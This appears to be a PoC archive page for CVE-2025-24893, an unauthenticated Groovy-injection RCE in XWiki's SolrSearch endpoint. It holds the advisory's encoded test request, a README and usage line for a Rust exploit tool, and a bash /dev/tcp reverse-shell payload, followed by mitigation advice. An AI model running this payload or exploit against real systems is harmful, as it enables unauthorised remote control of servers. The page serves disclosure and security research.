Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Source
Associated Vulnerability
Title:Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description:XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Description
 Proof-of-Concept exploit for CVE-2025-24893, an unauthenticated Remote Code Execution (RCE) vulnerability in XWiki. Exploits a template injection flaw in the SolrSearch endpoint via Groovy script execution.
Readme
# CVE-2025-24893 — XWiki Unauthenticated RCE (PoC)

Proof-of-Concept exploit for **CVE-2025-24893**, a critical unauthenticated **Remote Code Execution** vulnerability in **XWiki**.  
This exploit abuses a Groovy template injection in the `SolrSearch` endpoint to execute arbitrary commands — including reverse shells — without authentication.

## 💥 Vulnerability Details

A flaw in how XWiki handles crafted input to the `SolrSearch` RSS endpoint allows attackers to inject Groovy code into the rendering pipeline.  
This enables **unauthenticated RCE** via `{{groovy}}` script blocks.

### ✅ Affected Versions

- `< 15.10.11`
- `>= 16.0.0` and `< 16.4.1`

### ❌ Fixed in

- `15.10.11`
- `16.4.1`

---

## 🔧 Usage

Download the release:

[Releases](https://github.com/investigato/cve-2025-24893-poc/releases/tag/v0.1.0)

or build from source:

```bash
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
```

### Reverse Shell Payload

There's a prebuilt reverse shell payload in this form:

`bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1`

---

## ⚠️ Legal Disclaimer

This code is for **educational and authorized security research only**.
Do **not** use this exploit against systems you do not own or have explicit permission to test.

---

## ✍️ Credits

- Exploit PoC by [Artemir7](https://github.com/Artemir7/CVE-2025-24893-EXP)
- Rust port by investigato

---

## 🛡️ Detection & Mitigation

- Update to **XWiki 15.10.11** or **16.4.1+**
- Monitor suspicious use of `/bin/get/Main/SolrSearch?media=rss`
- Disable Groovy execution for anonymous users if possible
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →